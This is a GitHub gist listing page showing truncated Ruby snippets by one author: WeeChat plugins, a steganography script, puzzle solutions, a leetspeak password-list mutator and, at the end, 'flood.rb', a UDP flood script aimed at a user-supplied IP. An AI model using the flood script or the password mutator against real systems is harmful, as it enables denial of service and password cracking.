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Ninjex / main.rb
Last active December 21, 2019 20:58
Hackthisite Programming 2 (Requires Mechanize and RMagick gems) -- Autocompletion
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Ninjex / substitute.rb
Created March 17, 2014 16:26
Substitute character values in a password file, generating new strings. Save to the desired file. -- Not very efficient
@convert = {
"e" => ["e", "3"], "l" => ["l", "1"], "o" => ["o", "0"],
"a" => ["a", "4"], "t" => ["t", "7"], "s" => ["s", "5", "$"],
"c" => ["c", "("], "g" => ["g", "6"], "p" => ["p", "9"],
"b" => ["b", "8"]
@arrays = @convert.values # Grab all arrays in the hash
Ninjex / sql.rb
Created March 17, 2014 15:07
Query a MySQL database from within Weechat. Ruby plugin
# Required packages / gems
# libmysql-ruby libmysqlclient-dev
# gem mysql2
require 'mysql2'
@options = {
"public" => "false", # MySQL query result publicly visible
"host" => "localhost", # MySQL host
"user" => "root", # MySQL username
Ninjex /
Last active August 26, 2022 10:57
How to: Setting up Sublime Text to work through an SSH tunnel.

First, you need to install the Sublime Text package manager.

To do this, open up Sublime Text, and hit hit the cntrl+p key binding (or navigate to: Preferences -> Package Control)

When prompted for the search query, type the following: 'Package Control: Install Package'

Press enter, and shortly it should generate a list of plugins that can be installed to Sublime.

Search for the following plugin: 'RemoteOpen' and press enter. This will begin the installation.

Ninjex / short_url.rb
Last active August 29, 2015 13:57
A Weechat plugin for shortening long URL's. This script uses the URL shortening application at
# Need to add a validation check on URL's -- just don't be ignorant with it :D
require 'mechanize' # Necessary to communicate with the server.
def weechat_init
Weechat.register('short_url', 'Ninjex', '1.0', 'GPL3', 'Shorten a URL /short_url <link>', '', '')
Weechat.hook_command('short_url', 'Shorten URL /short_url <link>', '', '', '', 'short_url', '')
return Weechat::WEECHAT_RC_OK
def short_url(data, buffer, args)
Ninjex / exec.rb
Created March 10, 2014 19:31
A Weechat plugin coded in Ruby. This plugin allows you to run command on your machine from IRC, additionally you may choose to directly post the messages to all users in IRC with the -p option. For example: /exec -p echo 'hi'
def weechat_init
Weechat.register('exec', 'Ninjex', '1.0', 'GPL3', 'Execute a terminal command via /exec <command>', '', '')
Weechat.hook_command('exec', 'Execute a terminal command from chat', '', '', '', 'exec', '')
return Weechat::WEECHAT_RC_OK
def exec(data, buffer, args)
to = nil
buffer = Weechat.current_buffer
Ninjex / stego.rb
Created February 28, 2014 16:20
This script will take text and embed it into a picture via tampering with pixel LSB values.
require 'rubygems'
require 'RMagick'
prompt = '> '
puts "Image to embed (not overwritten):"
print prompt
image_file = gets.chomp
img = Magick::Image::read(image_file)[0]
width = img.columns
height = img.rows
Ninjex / hailstorm.rb
Created February 27, 2014 15:32
Hailstorm Function
def hailstorm n
vals = [n]
while n > 1 and n = (n.even?) ? (n/2) : (3 * n + 1)
vals << n
p vals # List returns
Ninjex / fizzbuzz.rb
Last active August 29, 2015 13:56
FizzBuzz with classes
class Enumerator::Lazy
def filter_map do |holder, *values|
result = yield *values
holder << result if result
class Fizz
Ninjex / flood.rb
Last active July 19, 2018 01:42
Ruby UDP Flood
require 'socket'
if ARGV[0] == '-ip' then ip = ARGV[1] end
if ARGV[2] == '-t' then seconds = ARGV[3].to_i end
if ARGV[2].nil? || ARGV[2].empty? then abort "Usage: ruby flood.rb -ip <ip address> -t <time in seconds>" end
bytes = 'Z' * 1000
def get_time(one, two)
(two - one).to_i
puts "UDP flooding IP: #{ip} for #{seconds} seconds!"